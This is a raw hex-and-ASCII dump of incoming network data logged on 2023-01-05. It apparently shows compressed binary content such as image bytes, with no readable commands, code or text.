                                                                                                                                                                                    2023-01-05 07:58:11 UTC6667INData Raw: 86 49 d6 53 8d 98 e6 3e c9 ee 09 14 30 3c ce e3 fd 36 f2 f3 5e ad ae 6a ca 7d 6c f9 25 a2 87 3a 3c dd 98 4c 99 1f 53 24 97 ac 6c ac 07 6d 4d 2b 54 76 f3 5b cf 6c 3c 8c ad cd ad 69 e3 be d0 d7 b0 86 52 67 ec e9 bd 64 c7 14 d3 aa f6 a1 b6 21 2c 84 44 a2 a6 4e db ca a1 ec ee bf b9 6d bd 4d af 53 4e bc c1 95 9c 23 1b eb 11 02 4c 57 0f b7 da 32 58 4c 6c 0a 92 80 23 08 ad f2 2b 79 ff 00 a9 d5 ae 86 92 62 a1 0f 62 88 0c b4 62 09 78 81 65 00 d0 d4 6b 2b 33 54 a4 e8 1b 4f a3 b3 37 8c 6e f6 de 5c 08 5c ac 88 8d 42 5c 91 f2 99 5d 5b a6 ed 63 de 06 a9 24 8d c7 d0 58 b3 c6 63 c8 c3 26 45 91 c3 95 66 0e 96 d5 5e db 6e e8 f7 35 3f 23 f4 14 41 27 03 64 c6 da a0 5c 2c 03 24 31 e3 35 d2 48 57 89 56 ea 79 4f 2f f9 79 74 e5 d8 44 f9 84 39 45 a6 95 63 92 1b 2e 49 26 6a 44 fc
                                                                                                                                                                                    Data Ascii: IS>0<6^j}l%:<LS$lmM+Tv[l<iRgd!,DNmMSN#LW2XLl#+ybbbxek+3TO7n\\B\][c$Xc&Ef^n5?#A'd\,$15HWVyO/ytD9Ec.I&jD
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6683INData Raw: 89 2e 34 28 d2 45 49 0a b3 31 5b 0a fe 65 6b ca 79 f9 59 75 d3 da 02 99 3b 86 f9 ea 49 e1 cb ca c1 c7 55 31 fd 21 b3 21 8d 42 4b cc aa 9d ae 2d 2c ae a5 3b 7e 55 d7 3e dd 89 4c 9b 1c e3 d7 de a8 cc d9 72 17 17 19 fb 6f 14 08 27 78 c9 51 21 02 b4 b1 39 55 63 e6 d7 25 5f 6e 3f 94 96 cd 34 f0 c7 27 6f d4 61 26 db 91 b1 c0 91 72 5a 98 d3 8b 45 dd a9 63 79 23 c7 95 a9 7c 57 db dd 6d 6c 93 f4 ff 00 f1 2d 19 2f 5a 67 47 8c 91 c7 6d f2 4c 4b f6 c9 a1 b0 a8 65 c8 96 d1 72 33 35 16 18 ff 00 e5 b4 9e 6d 33 3b e0 67 d3 21 73 a0 88 c1 90 ae 71 d8 bc 8b 21 e6 5b f9 3e 5d 79 db ef 2e a9 58 84 51 cf ea 39 22 c9 97 6d 85 42 42 c1 e2 76 90 77 1c 31 34 67 8b dc f7 57 e0 d5 59 e0 96 cf 18 be 8e 8a 25 19 19 92 09 a2 4a 3a c6 80 82 c0 7b d5 b5 ad f8 74 ea df 20 91 e7 72 db f6
                                                                                                                                                                                    Data Ascii: .4(EI1[ekyYu;IU1!!BK-,;~U>Lro'xQ!9Uc%_n?4'oa&rZEcy#|Wml-/ZgGmLKer35m3;g!sq![>]y.XQ9"mBBvw14gWY%J:{t r
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6731INData Raw: e9 8c 5c c4 2c 5a 46 ca 88 c6 b4 65 21 68 e3 83 c4 d1 f4 ba 7b 8e ba 8e ab 91 13 bd 3f 26 e7 bc 4b 3e 14 13 31 da e2 90 84 5f ea 03 5b 44 91 3f f5 91 07 2d b7 f2 7b ba 73 e8 5a 13 d6 1e 93 88 ee 8d 10 98 54 10 1a de 66 65 03 f3 14 78 72 f9 ee 6d 63 65 0e 04 d0 ce e5 ba e1 63 2e 2e de d1 96 8d af 10 b2 d1 89 a1 f0 8f c2 c7 36 ea 9e b5 65 02 1b f5 73 e4 47 86 92 e3 2d 8a 38 c9 11 4a ca d7 0e d3 5c d1 92 bc 88 dd 3e 6d 73 6b f0 eb ad cc b6 34 74 fd 83 02 3f 48 6c f8 f8 46 56 65 c9 25 d5 99 50 00 ef 47 a4 9e 64 e3 ef 73 6b be aa 11 a1 87 f5 e7 ab 60 c1 c7 6c 45 c6 72 b2 b8 0d 95 35 c4 5c bc c6 97 2f 33 d3 a7 a6 ef 8b 58 4c ca 0b 10 1a 75 5c 44 dc f3 c1 95 d1 40 69 27 a3 b3 21 e2 2d 62 58 7b b6 26 ae b3 06 4d 99 0d c3 d4 30 19 9b b4 96 c6 05 2d 71 52 0f 4b ad
                                                                                                                                                                                    Data Ascii: \,ZFe!h{?&K>1_[D?-{sZTfexrmcec..6esG-8J\>msk4t?HlFVe%PGdsk`lEr5\/3XLu\D@i'!-bX{&M0-qRK
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6747INData Raw: 23 81 9c 9f 4a 6c bb 4e da 37 2c 5c b8 06 7c 6a 06 4c 4d 30 64 32 0e 68 e2 81 55 4b 34 d2 1e 4e 4e e4 7f 87 5d 6f 42 b2 46 4a e5 5e f5 b1 ed cb 24 63 6f 93 27 17 2a ee ec f8 99 82 c9 14 02 b2 7c b6 b1 51 91 b9 fe 74 7f 2f a7 51 b6 8a 9c 1a d6 d2 5f 7a ab 6f c5 c8 c6 8f 23 21 c4 6c bc c1 84 c4 30 67 e5 8d 79 3d ef 7b 5c 16 6d 70 6c 8b ff 00 46 7a 46 2d ff 00 06 7c a9 a7 94 ce b5 48 b2 03 02 b5 0b 6f 34 4d cc c8 8f e6 6e ad 72 2d 6f 66 59 49 1a ad b7 d3 83 17 0a 3c 49 1e 1e d4 29 6e 48 11 15 47 1e 79 25 f1 66 56 af bd ad 55 23 fe 05 15 ff 00 fe 8a f6 fd eb 01 31 e1 8b 1d 30 0b 48 d0 a0 76 3d a7 76 f7 eb 73 af ba be ef 2e ba 6b 57 6c a1 33 19 27 e8 b6 d5 94 b2 e2 01 26 0e 6c 64 80 c5 8b a3 71 2b 72 09 39 6d 6a 72 73 2e b8 d6 fd 95 b4 32 20 b0 d9 bf 42 31 e2
                                                                                                                                                                                    Data Ascii: #JlN7,\|jLM0d2hUK4NN]oBFJ^$co'*|Qt/Q_zo#!l0gy={\mplFzF-|Ho4Mnr-ofYI<I)nHGy%fVU#10Hv=vs.kWl3'&ldq+r9mjrs.2 B1
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6787INData Raw: 91 29 6b 22 54 62 49 6a f5 bf b8 a9 e7 fe 5d 42 db 1c 09 c1 82 c8 f5 e6 e5 9f 18 c4 c5 88 63 61 a7 82 c6 a5 9b 9b c7 b9 29 e6 b5 8f bb 6e b2 be ef 44 63 c9 23 d1 5f a6 f9 d3 46 7d 4e ed 03 4a 8c 53 16 29 90 94 52 79 7e ae 61 ee c5 fd 24 b6 df 36 b4 ee ec b0 6d 54 7b fd 40 da 32 f0 22 87 27 33 39 f3 48 6a c9 2b 9a a5 fd 47 e9 96 bd 29 d1 d3 ae 46 ac b9 15 d1 9d 83 2f 1b 7f 89 70 71 96 64 dc 64 7b 8d 67 61 1c 8c 2e 65 29 0f 4a b9 5e 4b 7a 7d de ad 6d 4a 46 11 8f 61 9d 87 70 dd 31 0b e7 6d 96 84 84 15 9e 49 41 0a a0 f2 f6 db 87 53 f4 5b d5 ad 75 fb 5c 8b 93 4d 26 ea b9 58 1f 52 b8 52 47 24 85 2c 4b 8f 68 10 79 65 b8 fc c6 bd d6 d4 8d b9 75 be cb d5 a9 63 e0 a7 de 7f 50 f7 cd f5 e2 8f 20 24 46 29 5a 47 08 9c cd 4f e9 cd ef 44 9e e5 aa ba e6 b6 d4 ca 4d b1 98
                                                                                                                                                                                    Data Ascii: )k"TbIj]Bca)nDc#_F}NJS)Ry~a$6mT{@2"'39Hj+G)F/pqdd{ga.e)J^Kz}mJFap1mIAS[u\M&XRRG$,KhyeucP $F)ZGODM
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6834INData Raw: 9c dd e7 36 24 9d d5 c9 8c d5 98 d4 d6 c2 a9 77 37 96 dd 79 0b c6 b7 93 6c fb 2b f7 76 29 5b a9 63 b3 7a 82 2c dd c1 5b 1e 53 f4 e9 10 38 e4 28 42 01 1e 16 46 7a d6 4d 1b 6e fc 6b a7 f8 d4 7c 8d 7a e7 d6 9b 84 bd 9c 38 c1 86 69 90 33 b7 1f e1 8b fd e7 d3 db 6f ee ad df f1 5f 88 fa f5 c2 21 c7 ea 65 d8 9a 65 cb 99 c6 43 85 77 a5 59 c3 15 11 23 53 a8 dd e5 5d 63 b3 45 b6 59 33 45 4e a2 7a 67 77 f5 76 dd 93 26 3e d1 86 b9 18 64 86 5f ab 88 8e d9 61 6f 83 32 da ee a7 9f 97 5e e6 b7 d2 bd 49 eb 9c 16 5e bc c4 f5 46 d3 8f 0e ec 98 78 e9 92 eb 49 26 db e3 31 bc 02 a3 e4 49 6b 5a e9 27 b5 e4 47 8b 57 db d5 8d d4 f3 fa 57 14 3b 4e 43 e5 67 4c e4 aa de 40 17 ab 3b 8a b7 ec 16 d2 db d7 5e 6d fc af 7c 3f b4 94 8e a3 9f bd e1 6c 98 cb b8 ee 73 c5 8f 8f 90 78 70 bd 9f
                                                                                                                                                                                    Data Ascii: 6$w7yl+v)[cz,[S8(BFzMnk|z8i3o_!eeCwY#S]cEY3ENzgwv&>d_ao2^I^FxI&1IkZ'GWW;NCgL@;^m|?lsxp
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6850INData Raw: d7 b3 47 26 5b 34 92 ce e6 49 a1 8a 3b dc d4 5a d2 48 83 fd 4f 79 f5 95 e3 5d 65 fd a5 d6 c7 1f df b2 a5 9e 53 89 83 14 90 44 b2 3b 24 27 a8 5c 79 5d fd e9 2c e5 6f 77 a5 75 c9 4b 24 a7 f1 26 ce 49 1b ee d2 f8 38 b8 ae f2 b7 d5 e4 2d ef 1d 09 20 78 0b 98 f9 b5 96 9d aa ed c7 db 52 5a 3a b7 e9 e7 a9 f2 77 ac 78 cc 6a 06 56 3a a8 9e 49 47 2b 7d 89 12 25 2d f7 9b 9b 97 5e 8a b4 f0 5d 49 bf aa 5b 4e e7 91 9b 82 b8 59 27 1b 21 c3 33 2c 4c e1 51 14 72 e4 5a 9c dd 47 b5 7f 9d 9f 58 dd b4 fe 86 8f 28 e4 7e a3 f4 f4 d8 59 32 63 ee 18 f2 2e 5c 4a 65 6c 88 aa cb 32 d2 a3 95 85 a5 ae e7 96 5b bb 9d 5a a5 69 e4 cd d5 8c b7 a8 b0 93 19 db 6d 87 fe a2 60 14 c7 28 25 41 ad 6e 47 53 e6 f2 e8 55 49 90 54 ca a9 03 33 e4 4a b3 e4 3a 85 b6 21 45 8c 13 59 0b 33 f3 3c 9c b6 6b
                                                                                                                                                                                    Data Ascii: G&[4I;ZHOy]eSD;$'\y],owuK$&I8- xRZ:wxjV:IG+}%-^]I[NY'!3,LQrZGX(~Y2c.\Jel2[Zim`(%AnGSUIT3J:!EY3<k
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6898INData Raw: ea 7f 46 61 7d 36 d9 1c 51 ce 61 5e 35 72 b6 e5 c3 24 24 b4 cd 72 b7 6a 4b 56 d7 8f 9f 4e dc e0 84 6e 7d 23 bb e0 ed 70 46 db 74 0c 31 73 82 96 c7 62 df 22 46 35 64 47 6e 63 1a 35 6d e5 e5 d7 3d d2 4c da 8d a2 1f ad a1 99 70 f2 33 27 71 28 ed 99 16 3a 96 74 48 dd 79 a3 5a 32 ae 28 79 3e 6e b8 36 ea f9 2d 28 d1 e1 19 bf 44 7a 5b 03 76 cb c8 c3 df 24 1b 7c b3 c3 1c d8 d2 b3 2a f8 f1 ba 8d e6 95 79 ed f7 34 7c 7e 82 a3 46 eb d6 5b 84 47 6f 82 48 a7 8b 2e 2c 59 54 c4 81 d4 3c 96 79 b9 79 cf bd 7d 3c ba 8b 3e b1 26 ad 9c 6f 7a cc fa fc 99 b3 83 5c 65 25 c2 8a 9a 0f 2a f1 e3 e1 a9 4f 27 33 20 6c ed 81 34 eb 2e e1 21 44 1c 5d 42 9a b5 2a 68 9e ed de f6 9e c5 68 f6 88 95 bb cf 95 01 87 17 70 62 b1 c6 16 44 15 0c 42 4c 2e 46 a8 26 bc be 56 e6 d6 b5 d6 d0 d3 93 ce
                                                                                                                                                                                    Data Ascii: Fa}6Qa^5r$$rjKVNn}#pFt1sb"F5dGnc5m=Lp3'q(:tHyZ2(y>n6-(Dz[v$|*y4|~F[GoH.,YT<yy}<>&oz\e%*O'3 l4.!D]B*hhpbDBL.F&V
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6906INData Raw: 5f bb a6 4c 18 3d f2 19 72 32 e7 8a 20 66 91 64 70 45 a6 e1 46 3c d6 2f 04 f8 bc ba eb a3 10 9b 5f a8 b7 1d ae 5e e6 26 43 09 11 4a ad c2 e0 03 75 2a 87 b8 2f 4e a9 a4 c6 7a cc dd 71 f3 58 16 42 82 ca 32 aa d5 8b 01 5b c9 06 8d dd 93 af fc ba 8b 28 12 46 87 71 f4 b4 3b 3c 10 c9 b7 e4 7d 53 cd 08 fa b4 86 d7 48 8b 74 c2 d2 25 c1 8b 7b be 5d 73 bd 93 82 99 ef 72 8d 37 0d 9e 20 d3 91 98 cf 54 8f 81 16 c6 7b 48 b2 b0 e6 47 f3 ae b2 ab 54 72 5f 6c 10 7d 15 16 5e 16 e7 95 da 08 e8 a0 44 c0 d0 b5 ec 7b 31 88 ed 6e 57 ab b5 cd 75 bd bb ef d6 bb 6e 9a 59 ea 24 e0 d3 6f 3e 8a 11 64 e4 c3 0d d2 18 5e 38 81 ab 53 21 29 62 4a a5 16 d8 d4 15 e7 f7 2d bf 58 da ea be aa c3 4e 4a 4c ff 00 52 cb 26 29 db 4a 32 4f 08 30 c8 0b 54 70 3e cf 33 b5 3c cd ad f0 b8 33 b1 55 b0 e4
                                                                                                                                                                                    Data Ascii: _L=r2 fdpEF</_^&CJu*/NzqXB2[(Fq;<}SHt%{]sr7 T{HGTr_l}^D{1nWunY$o>d^8S!)bJ-XNJLR&)J2O0Tp>3<3U
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6962INData Raw: 5a 04 56 0b 39 67 f9 8b 6f b8 b1 f4 6b 87 73 4c aa e0 ca 47 8b 14 8c ec 1d ee 90 d5 8b 1e 27 8f 9b f6 eb 05 76 8a ec 57 a4 f2 61 cc b3 28 68 c8 3c 0b 29 03 f6 da 4e ba 2d 55 75 0c a3 53 21 de 37 4c 6c 7c bc 65 90 e4 4a ec 91 c9 1b 1b eb 1f 3f 25 bc f1 b7 9b fc ba e3 d5 ae ba 9e 0b f8 ce bf e8 1d 83 78 f5 36 0c 6d ea 98 55 32 a2 b3 e9 f2 58 d2 79 54 5d f2 f3 10 7e 61 5f 25 fc de 6d 74 ef d8 b6 56 38 7f b8 75 d7 05 df ac e5 c0 f4 46 cb 23 ed 90 81 b8 4e 5d 10 20 25 96 53 6c 92 3c af ed b1 13 95 7e ea 26 b9 31 5c 1a 95 fe 9a fd 30 da b6 34 9b 72 be 76 ca 52 ef 04 d3 96 b4 19 07 6e 54 58 bf 2d 5e 67 6e 56 fc cf 8b 5a 2b 3b 61 12 e1 64 e4 7f aa 9b cc 0d bb 63 89 31 a1 95 f1 47 fd 45 c8 e8 d3 37 85 99 0c 85 19 d1 2d f9 6d 1e ba b5 d3 af 26 2d c9 9a db bd 37 bb
                                                                                                                                                                                    Data Ascii: ZV9goksLG'vWa(h<)N-UuS!7Ll|eJ?%x6mU2XyT]~a_%mtV8uF#N] %Sl<~&1\04rvRnTX-^gnVZ+;adc1GE7-m&-7
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6978INData Raw: 43 9b b1 c1 14 ad 11 9c 35 10 32 32 03 42 cc 01 ed b2 b7 83 27 44 9f 15 da dd d9 ae 0a 2b 9f 15 61 00 64 37 ee 54 e3 fe 0c 75 b4 8c 99 0e ec cb 8f f4 51 04 82 16 60 c5 d4 73 b7 fe a3 f5 3f f9 75 9d aa 12 37 99 3c b8 a3 95 de 45 8e 9c 4f 1a 13 d3 c7 4a a0 3a 93 90 8b 2c 65 a4 5a 33 38 0c 41 35 f3 aa fb 1a 1e a6 f7 d7 44 4b 0e c2 4e a7 71 c9 8c 63 da 22 7b 55 39 88 5e 3e 62 cf e1 c7 42 f6 a0 99 24 65 6c 79 3b 52 34 99 d1 b4 6b c6 d2 48 a1 35 f0 bd 6f 1c eb 75 ba 16 c4 cb 75 22 c4 d8 a0 25 86 53 23 12 08 e1 68 fb 39 f5 a1 99 7b 9d 87 bd e4 61 76 32 5d f2 f6 ec 37 0a 05 4b 24 57 74 59 77 e5 ab 9e 5e ab 6e d3 92 53 44 ff 00 d3 bc 44 c3 df b1 32 0c a1 25 c4 9e f7 8a 43 69 e5 07 80 63 e0 fe ee b2 f9 55 5c b3 5f 8e 4d 9f af 9f 2b 36 5c 96 cb 57 63 3b 34 f1 a4 0a
                                                                                                                                                                                    Data Ascii: C522B'D+ad7TuQ`s?u7<EOJ:,eZ38A5DKNqc"{U9^>bB$ely;R4kH5ouu"%S#h9{av2]7K$WtYw^nSDD2%CicU\_M+6\Wc;4
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6986INData Raw: 31 f3 af bb ac ef e4 ad 7c 84 94 d0 e1 f6 72 13 b8 a5 c2 4c 2e 43 c0 38 46 17 a5 de 5a db 6f c3 ae c5 79 c8 da 36 3f 58 fe b1 f5 44 0c d2 30 13 64 86 07 85 c1 10 dc a0 f6 c2 dc b0 c2 bd a5 6f 36 a2 f6 63 aa 3a a7 ae 77 0c 4c 35 69 50 5b 1c 08 57 b8 aa 16 a4 73 78 d7 a9 8f 2a 72 eb 97 d4 da cc c6 6f 34 8f 0a 4d d6 34 65 71 0a 34 66 61 f2 ea a2 c8 92 c1 fd 4e 6f c5 e6 d5 a6 62 72 ec bc 7c fc f7 97 3a 75 79 a5 63 7c 92 53 81 fe 1e 5f c0 ba e8 f9 6a b1 20 5b ed db 70 d9 d4 3e 6c 1d cc 86 20 8b 8a 90 a0 8f f4 ff 00 cd 76 b9 ad 77 b3 ed 25 92 67 cc 51 2a c8 dd 98 96 9c b6 80 1a bf b7 87 2f c3 a2 ba df a8 e0 89 97 ba ab bb 4f 11 b2 10 84 30 63 69 71 51 c1 2b d6 f5 ea b7 5d 15 aa 40 7a cd c6 5c 2c 21 98 99 38 92 77 40 07 1d 24 63 32 5d e0 5a 37 8d 13 97 cf ce da
                                                                                                                                                                                    Data Ascii: 1|rL.C8FZoy6?XD0do6c:wL5iP[Wsx*ro4M4eq4faNobr|:uyc|S_j [p>l vw%gQ*/O0ciqQ+]@z\,!8w@$c2]Z7
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7041INData Raw: 1d 57 84 4a 6e 7a 3b b1 b1 43 3b 46 b1 2e bc cd d5 f7 1b d5 98 ed fb 6c fa 59 06 54 0c 54 31 24 31 e0 59 ab e2 8b e3 f1 5d ae bd 3b 27 0c 8b a2 8b c3 c7 5d 46 24 a5 45 c8 82 a2 a6 65 3c 3e 21 fb 7f 76 81 91 0a 12 68 05 6a 69 4d 50 16 19 5b 71 c2 84 48 4d c4 b5 0d 7c 2b e3 c3 58 d6 fd 99 32 3e 36 e5 9c 2f 68 00 d2 01 42 4d 07 1f 7b e1 d2 ec 12 74 6f 48 fe 87 ee 59 39 66 2c 99 71 92 28 c2 17 7b af 65 bb c4 c3 10 5e 77 f7 5e f4 45 d5 2d 7f 20 ed 83 65 b1 fe 96 b6 ca 77 3c dd e1 31 f2 60 83 1e 45 c7 12 3d 81 aa 2e fa 87 65 5b e1 ed a7 43 f5 2c bd 3a 7a f4 74 cb 33 93 2b 95 97 ba c9 e9 9c 6f 4d c7 89 89 26 4c 27 c0 06 33 dd 23 55 32 21 37 2f fd 43 dd f3 1b 9f bb a7 6b ab 60 a4 a0 cd 7a 4b 70 ca da e4 fa 5e 52 ef 90 16 68 e5 03 99 91 b8 47 25 78 f5 fc 5d 5a e0
                                                                                                                                                                                    Data Ascii: WJnz;C;F.lYTT1$1Y];']F$Ee<>!vhjiMP[qHM|+X2>6/hBM{toHY9f,q({e^w^E- ew<1`E=.e[C,:zt3+oM&L'3#U2!7/Ck`zKp^RhG%x]Z
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7057INData Raw: c9 22 23 58 be 5b ac 2a b2 22 fb ba c6 d5 68 67 57 f4 f7 e9 ae 26 67 a7 70 52 78 ce 1e 79 40 f2 48 ab 6b 95 66 66 ed 4a bd 27 91 85 b7 0e 5d 74 7c 0a cb 23 ad da 30 3e bb fd 10 dc b0 17 fb 8e d9 6e 4c 31 dc 5d 53 f3 02 f8 df db a7 37 c7 67 f0 ea 56 a7 52 fb 49 45 b4 e1 47 22 aa 94 ef 4b 6f 2a 9e 05 48 f2 93 e3 ed bb 9b 5e 66 cb b4 cd 92 29 a4 7c 8d 96 77 ed 10 6e 42 8f 13 0a ab c6 4f 3c 52 7d 9e 5f ba da e9 a5 bb 22 1a 82 14 8c a8 3e 40 3d b2 f7 50 f8 8f b5 4e b5 24 87 95 38 c8 62 42 aa 1a 7b 3d a6 be cf b3 56 b0 21 88 e4 28 68 94 e3 f6 ff 00 f0 d5 00 b7 54 86 b6 9f 6f f8 fb 7f c3 48 06 5d 56 e2 07 81 d3 02 44 70 54 56 b5 5f b4 69 36 05 cf a3 b3 f1 f6 8d c2 3d d7 77 c0 6d cb 0a 06 02 d0 c4 2a 31 3c b2 32 5a cb 2d be 48 9e d5 66 d5 d2 c9 31 34 77 ed cb f5
                                                                                                                                                                                    Data Ascii: "#X[*"hgW&gpRxy@HkffJ']t|#0>nL1]S7gVRIEG"Ko*H^f)|wnBO<R}_">@=PN$8bB{=V!(hToH]VDpTV_i6=wm*1<2Z-Hf14w
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7084INData Raw: 08 b6 0a bf 4b 7a 6f 0f 75 8b 24 e2 26 7e da 91 c8 11 65 33 4b 1c d2 b5 6e 96 79 a3 62 d8 ed 7f dc 6f 89 b5 db f0 ca 84 66 ad 05 1f ea 87 a2 27 ac 32 be e5 95 97 18 12 12 72 02 1b 29 45 54 57 8c 2f 71 d9 7a ae 5d 72 6f 6f 57 f1 15 32 64 a2 df b3 7d 3d 2c 5b 66 1b 95 80 a8 79 a3 02 e4 98 11 78 33 21 e6 79 50 5d 1b 1f 2d bc 9a e6 ca 4d b2 24 b8 cf fd 3b 58 73 a3 32 ab ae 0c ec b6 bb 75 12 ea 67 1d 3e 6a 75 5c ba ba d2 cb 90 33 fb 8f a4 b1 b1 32 57 12 49 ed 0a 95 ba 65 b5 78 8a 23 f2 07 76 61 ad 64 4d 41 63 e8 dd 8f 78 9b 6e c9 1b 64 b4 c7 59 06 3c f1 86 5f 98 e7 f2 18 46 b6 c9 cb dc fc ce 6f e5 d6 ab 6c e0 3a ce 4d 2e dd 91 9b 83 89 3d 66 5e c7 d0 37 71 3b 62 e5 70 2d 78 d9 13 95 5b b8 19 1a 59 3a 2d f8 b4 d6 c6 94 02 a9 d1 7d 39 97 87 06 cf 85 db 9a 37 89
                                                                                                                                                                                    Data Ascii: Kzou$&~e3Knybof'2r)ETW/qz]rooW2d}=,[fyx3!yP]-M$;Xs2ug>ju\32WIex#vadMAcxndY<_Fol:M.=f^7q;bp-x[Y:-}97
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7100INData Raw: 16 e3 c8 2a df 30 ba f3 a9 e9 e8 d6 d5 c1 93 2c 3d 38 af 89 89 26 34 89 74 d9 68 10 92 45 54 0e 6b 9b dd 5f 3a eb 2d 8e 4a aa 82 a6 5c ec 9c 91 24 b8 e4 ac 10 a5 cc 4f 80 24 f6 e3 5b bc ce cb d2 ba da 90 43 33 e6 36 26 8a 0b 39 e0 14 78 dc 7c bf ed e1 ae a4 64 7d 67 e9 0f 4e c3 e9 cd a7 1b 6c 81 2c 28 8a d2 d7 a8 ca c0 19 99 fe 2b f9 75 d7 55 04 16 da b1 06 80 0d 03 0d 02 0d 00 1a 00 34 00 68 00 d0 02 e8 01 34 00 68 00 d0 01 a0 03 40 0b a4 02 69 8c 34 84 1a 60 1a 40 1a 60 7f ff d5 e9 d5 d7 59 90 68 00 d0 20 d0 01 a6 01 a4 02 e8 01 34 c0 34 80 34 c0 5d 20 13 4c 05 d2 00 d3 01 34 00 57 40 0b a0 03 40 05 74 00 57 40 06 90 0b a6 02 68 00 d2 01 74 c0 4d 00 2d 74 80 2b a0 03 40 06 80 0d 00 79 69 2c f1 f0 f6 9f b3 f7 e8 90 3c 89 01 51 22 8a 82 40 e1 a5 20 79 19
                                                                                                                                                                                    Data Ascii: *0,=8&4thETk_:-J\$O$[C36&9x|d}gNl,(+uU4h4h@i4`@`Yh 444] L4W@@tW@htM-t+@yi,<Q"@ y
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7116INData Raw: b6 7a f0 79 c9 87 b7 db 50 79 24 75 8d 63 1c 02 9a 33 77 0f dd b7 9b ee ea 79 19 2e 49 0c 94 7a 05 0e c2 8d 4e 24 53 c7 8f 4f 2f 35 da 48 0a cc f7 78 d1 e4 43 d0 15 6b 4e 34 71 6f b7 f6 6b 5a 92 cc 82 e3 3b 3c 98 f8 ca dd ca 29 2d 5a 51 8f 39 bb f6 2c 6b e5 fb da eb 9c 19 16 13 25 63 58 f1 89 08 15 8f 87 29 5f cc ba bd 45 bc 1a ed 66 99 4c 79 a1 46 26 6a 93 90 11 79 f8 1f 12 38 ff 00 99 b5 0c 0a cc 8c a0 f2 31 1c a0 b3 9b bf 62 8e 4f f1 64 5b 7e f6 b7 4a 08 66 6f 7a a2 64 bc 76 85 b7 81 ff 00 0e af e6 d7 5e be 0c 6c 75 cf d0 cc 02 bb 56 56 48 07 e6 e4 da 78 70 e4 45 ff 00 8f 5d 74 d8 aa b2 ce 7b 55 b6 74 7f a7 2b 51 69 34 fb 75 cf 6f 3f 5a e5 a3 45 a1 88 16 5a d0 2f 86 b8 f7 7f 94 d7 5e 1f 63 4a e8 62 2c 73 35 4d 84 95 05 ab 50 00 03 8f b7 5c f5 ff 00 29
                                                                                                                                                                                    Data Ascii: zyPy$uc3wy.IzN$SO/5HxCkN4qokZ;<)-ZQ9,k%cX)_EfLyF&jy81bOd[~Jfozdv^luVVHxpE]t{Ut+Qi4uo?ZEZ/^cJb,s5MP\)
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7121INData Raw: 94 da b5 af 87 f8 ea 6d b1 15 5a c9 0f 23 72 78 d2 94 a1 f0 d1 4b c8 ad 58 22 8d de 59 38 57 87 ec 1a d1 b8 33 59 1f 19 13 4e 78 03 40 2b ac 1e c3 55 41 ac 9c e6 00 c6 6e ad 38 f1 f1 d2 5b 24 1d 06 b2 72 9d 64 2a c2 a2 b4 1f e1 aa 4d 7d 49 b5 46 4e 6c c8 4a 83 41 4f 1a ea fb 25 ea 4c 33 cb c9 3c 4e d1 11 c4 53 db c2 87 88 6d 3f 92 bf 52 7a b4 11 bc ae 6a 7c 2b e0 4d 35 16 d9 54 8a 4a 45 dc 84 4b 1a bc 8c 18 77 23 36 81 5f 06 1a e0 be e9 e0 e9 ad 52 16 4d c1 da 36 0a 96 c8 7c 6a 45 29 f6 0d 62 b6 cf 25 61 10 c3 d1 11 dd 6b 25 5b f6 d2 b4 b9 b4 d5 90 a4 94 92 96 80 40 40 f1 b8 9b 4d 49 1e c5 d3 a6 f5 56 4d b2 85 82 39 64 0c 40 27 80 00 d3 f6 fb 35 bd bc ba be 08 ae b2 c7 06 04 a3 31 15 2a 3c 49 e3 c7 a7 86 bc fb 6e ec ce 9a d6 09 6a 8f 15 6f 6b 9c 0a 81 4f
                                                                                                                                                                                    Data Ascii: mZ#rxKX"Y8W3YNx@+UAn8[$rd*M}IFNlJAO%L3<NSm?Rzj|+M5TJEKw#6_RM6|jE)b%ak%[@@MIVM9d@'51*<InjokO
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7137INData Raw: 8a 1a 13 4d 1d 90 ba b3 c4 b0 e4 90 43 40 d1 9f b5 87 fb 2b a6 b6 d7 d1 8d d1 84 ca 62 5a 58 cc 47 b4 ad 29 f8 3d e5 3a 15 bb 09 d6 0f 4a b5 28 68 cb 21 24 90 68 01 af d9 ff 00 9b 46 44 7b ec 45 65 ce c0 7b 09 a5 68 34 bb 30 84 34 ca 8f 5b 08 36 ff 00 87 0f fe 7a d1 39 24 42 c8 94 56 20 bb 01 5a 7f f3 d2 e4 63 9d e5 73 6b 25 38 71 34 a7 ff 00 73 c7 4a 60 06 94 c5 50 e6 97 01 e1 5a 57 d9 a1 b1 1e 96 20 91 05 00 00 09 35 f6 fd 9a 06 3b 0a dd 1d c4 94 0a 00 04 d7 fe c5 b5 16 bc 14 ab 22 37 06 21 95 41 e9 a3 1f 37 bf a3 91 8f 4f 12 dc 64 96 d6 a2 f0 1c 45 6b f0 eb 35 62 9a 13 b6 bd b5 31 b5 c6 a4 71 53 c0 ff 00 bd 6e 9a b3 78 13 a8 ab 12 2b 5f 8e 15 c1 a8 3e 20 1f f8 6e d1 3f 50 80 a0 92 ac c8 b4 14 03 88 5f 1f 2f ef d0 31 c1 10 67 06 3e 52 48 1e 3c 45 78 d4
                                                                                                                                                                                    Data Ascii: MC@+bZXG)=:J(h!$hFD{Ee{h404[6z9$BV Zcsk%8q4sJ`PZW 5;"7!A7OdEk5b1qSnx+_> n?P_/1g>RH<Ex
